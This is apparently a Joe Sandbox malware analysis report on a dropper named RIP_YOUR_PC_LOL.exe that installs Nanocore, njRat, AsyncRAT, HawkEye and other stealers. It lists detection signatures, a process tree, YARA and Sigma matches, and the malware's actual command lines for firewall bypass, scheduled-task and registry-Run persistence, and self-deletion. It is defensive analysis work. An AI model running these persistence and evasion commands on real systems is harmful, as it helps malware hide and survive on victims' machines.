Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RIP_YOUR_PC_LOL.exe

Overview

General Information

Sample Name:RIP_YOUR_PC_LOL.exe
Analysis ID:585264
MD5:52867174362410d63215d78e708103ea
SHA1:7ae4e1048e4463a4201bdeaf224c5b6face681bf
SHA256:37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a
Tags:exe
Infos:

Detection

HawkEye Nanocore njRat AsyncRAT Azorult DCRat Ficker Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected MailPassView
Yara detected HawkEye Keylogger
Sigma detected: NanoCore
Yara detected AntiVM3
Yara detected Azorult Info Stealer
Detected Nanocore Rat
Yara detected AsyncRAT
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Yara detected Nanocore RAT
Yara detected DCRat
Yara detected Generic Dropper
Yara detected Azorult
Multi AV Scanner detection for submitted file
Detected njRat
Malicious sample detected (through community Yara rule)
Yara detected Njrat
Antivirus / Scanner detection for submitted sample
Yara detected Mimikatz
Detected HawkEye Rat
Multi AV Scanner detection for dropped file
Yara detected Ficker Stealer
Sigma detected: Suspicius Schtasks From Env Var Folder
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Drops PE files to the startup folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Creates autostart registry keys with suspicious names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Sample uses process hollowing technique
Sigma detected: File Created with System Process Name
Sigma detected: Suspicious Add Scheduled Task From User AppData Temp
Protects its processes via BreakOnTermination flag
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Yara detected WebBrowserPassView password recovery tool
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: CurrentVersion Autorun Keys Modification
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Sigma detected: Suspicious Add Scheduled Task Parent
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sigma detected: Autorun Keys Modification

Classification

Process Tree

  • System is w10x64
  • RIP_YOUR_PC_LOL.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe" MD5: 52867174362410D63215D78E708103EA)
    • healastounding.exe (PID: 3572 cmdline: "C:\Users\user\AppData\Roaming\healastounding.exe" MD5: 6FB798F1090448CE26299C2B35ACF876)
      • test.exe (PID: 6236 cmdline: "C:\Users\user\AppData\Roaming\test.exe" MD5: 7E50B292982932190179245C60C0B59B)
      • gay.exe (PID: 1104 cmdline: "C:\Users\user\AppData\Roaming\gay.exe" MD5: 8EEDC01C11B251481DEC59E5308DCCC3)
        • mediaget.exe (PID: 4688 cmdline: "C:\Users\user\AppData\Roaming\mediaget.exe" MD5: 8EEDC01C11B251481DEC59E5308DCCC3)
          • netsh.exe (PID: 7092 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Opus.exe (PID: 3244 cmdline: "C:\Users\user\AppData\Roaming\Opus.exe" MD5: 759185EE3724D7563B709C888C696959)
        • schtasks.exe (PID: 6420 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 7052 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp5D87.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • aaa.exe (PID: 3984 cmdline: "C:\Users\user\AppData\Roaming\aaa.exe" MD5: 860AA57FC3578F7037BB27FC79B2A62C)
        • aaa.exe (PID: 6256 cmdline: C:\Users\user\AppData\Roaming\aaa.exe MD5: 860AA57FC3578F7037BB27FC79B2A62C)
      • 8f1c8b40c7be588389a8d382040b23bb.exe (PID: 5376 cmdline: "C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe" MD5: 8F1C8B40C7BE588389A8D382040B23BB)
        • FFDvbcrdfqs.exe (PID: 6920 cmdline: "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe" MD5: 78D40B12FFC837843FBF4DE2164002F6)
        • Dcvxaamev.exe (PID: 6612 cmdline: "C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe" MD5: 870D6E5AEF6DEA98CED388CCE87BFBD4)
      • 4.exe (PID: 2824 cmdline: "C:\Users\user\AppData\Roaming\4.exe" MD5: E6DACE3F577AC7A6F9747B4A0956C8D7)
        • 3.exe (PID: 3964 cmdline: "C:\Users\user\AppData\Roaming\3.exe" MD5: 748A4BEA8C0624A4C7A69F67263E0839)
      • a.exe (PID: 5152 cmdline: "C:\Users\user\AppData\Roaming\a.exe" MD5: 52CFD35F337CA837D31DF0A95CE2A55E)
    • Pluto Panel.exe (PID: 4236 cmdline: "C:\Users\user\AppData\Roaming\Pluto Panel.exe" MD5: ED666BF7F4A0766FCEC0E9C8074B089B)
    • 22.exe (PID: 1272 cmdline: "C:\Users\user\AppData\Roaming\22.exe" MD5: DBF9DAA1707B1037E28A6E0694B33A4B)
      • netsh.exe (PID: 6500 cmdline: netsh ipsec static add policy name=Block MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 6596 cmdline: netsh ipsec static add filterlist name=Filter1 MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5932 cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5940 cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 1616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5748 cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5504 cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 6060 cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ___11.19.exe (PID: 6732 cmdline: "C:\Users\user\AppData\Roaming\___11.19.exe" MD5: A071727B72A8374FF79A695ECDE32594)
      • svchost.exe (PID: 6552 cmdline: C:\Users\user\AppData\Local\Temp\\svchost.exe MD5: A4329177954D4104005BCE3020E5EF59)
        • cmd.exe (PID: 1852 cmdline: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • svchos.exe (PID: 1588 cmdline: C:\Users\user\AppData\Local\Temp\\svchos.exe MD5: 3B377AD877A942EC9F60EA285F7119A2)
      • HD____11.19.exe (PID: 2508 cmdline: C:\Users\user\AppData\Roaming\HD____11.19.exe MD5: B14120B6701D42147208EBF264AD9981)
  • Opus.exe (PID: 6580 cmdline: C:\Users\user\AppData\Roaming\Opus.exe 0 MD5: 759185EE3724D7563B709C888C696959)
  • dhcpmon.exe (PID: 6328 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" MD5: 759185EE3724D7563B709C888C696959)
  • dhcpmon.exe (PID: 6308 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 759185EE3724D7563B709C888C696959)
  • mediaget.exe (PID: 6036 cmdline: "C:\Users\user\AppData\Roaming\mediaget.exe" .. MD5: 8EEDC01C11B251481DEC59E5308DCCC3)
  • mediaget.exe (PID: 1080 cmdline: "C:\Users\user\AppData\Roaming\mediaget.exe" .. MD5: 8EEDC01C11B251481DEC59E5308DCCC3)
  • TXPlatforn.exe (PID: 5700 cmdline: C:\Windows\SysWOW64\TXPlatforn.exe -auto MD5: A4329177954D4104005BCE3020E5EF59)
    • TXPlatforn.exe (PID: 1480 cmdline: C:\Windows\SysWOW64\TXPlatforn.exe -acsi MD5: A4329177954D4104005BCE3020E5EF59)
  • svchost.exe (PID: 6268 cmdline: C:\Windows\SysWOW64\svchost.exe -k " " MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 6052 cmdline: C:\Windows\SysWOW64\svchost.exe -k " " MD5: FA6C268A5B5BDA067A901764D203D433)
  • mediaget.exe (PID: 5644 cmdline: "C:\Users\user\AppData\Roaming\mediaget.exe" .. MD5: 8EEDC01C11B251481DEC59E5308DCCC3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
RIP_YOUR_PC_LOL.exeNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1308075:$x1: NanoCore.ClientPluginHost
  • 0x13080b2:$x2: IClientNetworkHost
  • 0x130bbe5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
RIP_YOUR_PC_LOL.exeRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
  • 0x7bdb7:$key: HawkEyeKeylogger
  • 0x7dff3:$salt: 099u787978786
  • 0x7c3f0:$string1: HawkEye_Keylogger
  • 0x7d243:$string1: HawkEye_Keylogger
  • 0x7df53:$string1: HawkEye_Keylogger
  • 0x7c7d9:$string2: holdermail.txt
  • 0x7c7f9:$string2: holdermail.txt
  • 0x7c71b:$string3: wallet.dat
  • 0x7c733:$string3: wallet.dat
  • 0x7c749:$string3: wallet.dat
  • 0x7db35:$string4: Keylog Records
  • 0x7de4d:$string4: Keylog Records
  • 0x7e04b:$string5: do not script -->
  • 0x7bd9f:$string6: \pidloc.txt
  • 0x7be05:$string7: BSPLIT
  • 0x7be15:$string7: BSPLIT
RIP_YOUR_PC_LOL.exeHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
  • 0x7901:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
RIP_YOUR_PC_LOL.exeJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    RIP_YOUR_PC_LOL.exeJoeSecurity_GenericDropperYara detected Generic DropperJoe Security
      Click to see the 12 entries

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

          Dropped Files

          SourceRuleDescriptionAuthorStrings
          C:\Users\user\AppData\Roaming\gay.exeJoeSecurity_NjratYara detected NjratJoe Security
            C:\Users\user\AppData\Roaming\gay.exeMALWARE_Win_NjRATDetects NjRAT / BladabindiditekSHen
            • 0x81fc:$s1: netsh firewall delete allowedprogram
            • 0x80f2:$s2: netsh firewall add allowedprogram
            • 0x825c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 6B 00 20 00 70 00 69 00 6E 00 67
            • 0x7ee6:$s4: Execute ERROR
            • 0x7f46:$s4: Execute ERROR
            • 0x7f0a:$s5: Download ERROR
            • 0x82a2:$s6: [kl]
            C:\Users\user\AppData\Roaming\gay.exenjrat1Identify njRatBrian Wallace @botnet_hunter
            • 0x80f2:$a1: netsh firewall add allowedprogram
            • 0x82ec:$b1: [TAP]
            • 0x8292:$b2: & exit
            • 0x825e:$c1: md.exe /k ping 0 & del
            C:\Users\user\AppData\Roaming\Opus.exeNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
            • 0x1018d:$x1: NanoCore.ClientPluginHost
            • 0x101ca:$x2: IClientNetworkHost
            • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
            C:\Users\user\AppData\Roaming\Opus.exeNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
            • 0xff05:$x1: NanoCore Client.exe
            • 0x1018d:$x2: NanoCore.ClientPluginHost
            • 0x117c6:$s1: PluginCommand
            • 0x117ba:$s2: FileCommand
            • 0x1266b:$s3: PipeExists
            • 0x18422:$s4: PipeCreated
            • 0x101b7:$s5: IClientLoggingHost
            Click to see the 35 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
            • 0xff8d:$x1: NanoCore.ClientPluginHost
            • 0xffca:$x2: IClientNetworkHost
            • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
            00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
              00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
              • 0xfcf5:$a: NanoCore
              • 0xfd05:$a: NanoCore
              • 0xff39:$a: NanoCore
              • 0xff4d:$a: NanoCore
              • 0xff8d:$a: NanoCore
              • 0xfd54:$b: ClientPlugin
              • 0xff56:$b: ClientPlugin
              • 0xff96:$b: ClientPlugin
              • 0xfe7b:$c: ProjectData
              • 0x10882:$d: DESCrypto
              • 0x1824e:$e: KeepAlive
              • 0x1623c:$g: LogClientMessage
              • 0x12437:$i: get_Connected
              • 0x10bb8:$j: #=q
              • 0x10be8:$j: #=q
              • 0x10c04:$j: #=q
              • 0x10c34:$j: #=q
              • 0x10c50:$j: #=q
              • 0x10c6c:$j: #=q
              • 0x10c9c:$j: #=q
              • 0x10cb8:$j: #=q
              00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
                • 0x97f3:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
                Click to see the 237 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
                  • 0x99f3:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
                  0.2.RIP_YOUR_PC_LOL.exe.d4dd52.5.raw.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
                  • 0x4e6a:$s1: blackmoon
                  • 0x4eaa:$s2: BlackMoon RunTime Error:
                  0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                    0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
                    • 0x7bf3:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
                    Click to see the 661 entries

                    Sigma Signatures

                    AV Detection

                    barindex
                    Sigma detected: NanoCore
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                    E-Banking Fraud

                    barindex
                    Sigma detected: NanoCore
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                    System Summary

                    barindex
                    Sigma detected: Suspect Svchost Activity
                    Source: Process startedAuthor: David Burkett: Data: Command: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\___11.19.exe" , ParentImage: C:\Users\user\AppData\Roaming\___11.19.exe, ParentProcessId: 6732, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ProcessId: 6552
                    Sigma detected: Suspicius Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth: Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Opus.exe" , ParentImage: C:\Users\user\AppData\Roaming\Opus.exe, ParentProcessId: 3244, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, ProcessId: 6420
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\___11.19.exe" , ParentImage: C:\Users\user\AppData\Roaming\___11.19.exe, ParentProcessId: 6732, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ProcessId: 6552
                    Sigma detected: Suspicious Svchost Process
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\___11.19.exe" , ParentImage: C:\Users\user\AppData\Roaming\___11.19.exe, ParentProcessId: 6732, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ProcessId: 6552
                    Sigma detected: File Created with System Process Name
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\22.exe, ProcessId: 1272, TargetFilename: C:\Windows\Help\Winlogon.exe
                    Sigma detected: Suspicious Add Scheduled Task From User AppData Temp
                    Source: Process startedAuthor: frack113: Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Opus.exe" , ParentImage: C:\Users\user\AppData\Roaming\Opus.exe, ParentProcessId: 3244, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, ProcessId: 6420
                    Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE, CommandLine: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE, CommandLine|base64offset|contains: l, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\mediaget.exe" , ParentImage: C:\Users\user\AppData\Roaming\mediaget.exe, ParentProcessId: 4688, ProcessCommandLine: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE, ProcessId: 7092
                    Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke (rule): Data: Image: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe, QueryName: api.ipify.org
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\mediaget.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\mediaget.exe, ProcessId: 4688, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466
                    Source: Process startedAuthor: Florian Roth: Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Opus.exe" , ParentImage: C:\Users\user\AppData\Roaming\Opus.exe, ParentProcessId: 3244, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, ProcessId: 6420
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Monitor
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Monitor
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, CommandLine: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentProcessId: 6552, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, ProcessId: 1852
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, CommandLine: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentProcessId: 6552, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, ProcessId: 1852
                    Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\___11.19.exe" , ParentImage: C:\Users\user\AppData\Roaming\___11.19.exe, ParentProcessId: 6732, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ProcessId: 6552
